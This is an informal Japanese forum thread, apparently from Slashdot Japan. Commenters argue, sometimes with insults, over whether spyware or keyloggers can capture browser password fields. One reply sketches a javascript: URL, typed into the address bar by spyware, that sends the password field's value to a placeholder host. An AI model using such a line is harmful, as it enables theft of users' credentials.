アカウント名:
パスワード:
ウィンドウメッセージを監視する Spy++ みたいなプログラムの動作原理を理解していれば Windows 向けのキーロガーは結構簡単に作れちゃうんだけどね。
で、具体的にはどんなことができるの?
で、どうやってアクセスするの? つか、どうやってアクセスするためのコードを HTML に忍ばせるの? そして忍ばせたコードを利用して取得した値を攻撃者が受け取る方法は?
より多くのコメントがこの議論にあるかもしれませんが、JavaScriptが有効ではない環境を使用している場合、クラシックなコメントシステム(D1)に設定を変更する必要があります。
目玉の数さえ十分あれば、どんなバグも深刻ではない -- Eric Raymond
一般人向けデモ用? (スコア:-1, フレームのもと)
<input id="pp" type="passwd">
pass = document.pp.value
の方が簡単だろうに。
でもそれだと素人さんにはわからないからね。
動画でキャプチャーされちゃうんだよー
とかの方が効果的なのかも。
Re:一般人向けデモ用? (スコア:1)
と思ったけど、スパイウェアからブラウザのアドレス欄に対して以下キー入力をSendMessageしたらイケルような気もしてきた。
[Ctrl+A][BS]javascript:document.href="http://example.com/?foo.cgi?pass=" + document.pp.value[Enter]
Re:一般人向けデモ用? (スコア:-1, フレームのもと)
キーボードパケットをキャプチャーできるくらいのスパイウェアなんだから、ほかにもいろいろ当然できるでしょ。
スラドはもう馬鹿しかいないんだな。
Re:一般人向けデモ用? (スコア:1)
ウィンドウメッセージを監視する Spy++ みたいなプログラムの動作原理を理解していれば Windows 向けのキーロガーは結構簡単に作れちゃうんだけどね。
で、具体的にはどんなことができるの?
むらちより/あい/をこめて。
Re:一般人向けデモ用? (スコア:0)
ブラウザの document.pp.value にアクセスする。
お前馬鹿だろ?
Re:一般人向けデモ用? (スコア:1)
で、どうやってアクセスするの? つか、どうやってアクセスするためのコードを HTML に忍ばせるの? そして忍ばせたコードを利用して取得した値を攻撃者が受け取る方法は?
むらちより/あい/をこめて。